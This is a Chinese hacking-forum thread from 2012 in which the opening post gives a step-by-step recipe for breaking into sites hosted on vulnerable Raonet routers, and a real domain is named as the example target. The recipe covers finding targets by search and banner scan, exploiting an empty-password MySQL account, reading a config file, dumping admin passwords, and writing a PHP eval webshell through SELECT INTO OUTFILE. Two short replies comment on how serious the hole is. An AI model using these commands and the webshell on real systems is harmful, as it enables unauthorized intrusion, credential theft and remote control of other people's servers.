找回密码
 立即注册
查看: 3744|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:# z& n( @6 N5 l
  h' R$ }4 X; ?) J
1:google搜索'Raonet Subscriber Ethernet Router'8 ^+ F- l+ p: I

" ~) i  j7 g4 [% Z8 F! w! Q2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
2 h" E4 E: u9 a: O: _2 c3 z  u
8 ~: w" Q2 w6 Z3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。: H2 T7 @( K- t" M, L  G+ \

* [, |( H6 I# b0 ]4 S//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
  m6 b4 o; d7 l9 `4 A& |- P2 x4 N: }9 Y
3 z3 k5 D5 c0 k6 l! e, h* ^3 U
% \' F  p# }% @+ C) X
入侵步骤:0 h/ z  _3 [- N

! O' ?5 h! A% D1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
$ I+ q. t3 l- Z5 e  y
6 K9 R, L( P; n$ q& R/ D2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc. m* X( T' V: h8 `7 E6 `; B* V
3:得到密码后连接,查看GUI管理密码:" r" C+ {5 n- J8 p- v
use ser_5003 ^$ Q# ]$ y/ e6 F
select id,passwd from user;; G% O+ e( |& D# U; j! [6 z& }) S
4:通过数据库写入webshell,执行命令:+ N/ O) E) X# x) X
use mysql;
1 Y' h) ^! l. S6 Rcreate table ok(cmd TEXT);
; x) O5 B0 O/ F  l6 D# h0 w5 ?2 {insert into ok values("<?php @eval($_POST[cmd])?>");
* h3 l$ `, k; H% ]% cselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
! P# o/ K+ v/ v1 Z8 ?drop table ok;
0 o' \# E. J& W; j$ |+ E' H& i$ U: n( {1 {+ f  y$ L# P& _
5:连接后门shell.php
8 ?+ [% D5 W! S) s
& n+ |9 O, d  K* Z6. 搞定!1 W8 X! }% q2 N
/ N/ N, u3 h3 e. n# O# h) b7 b
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表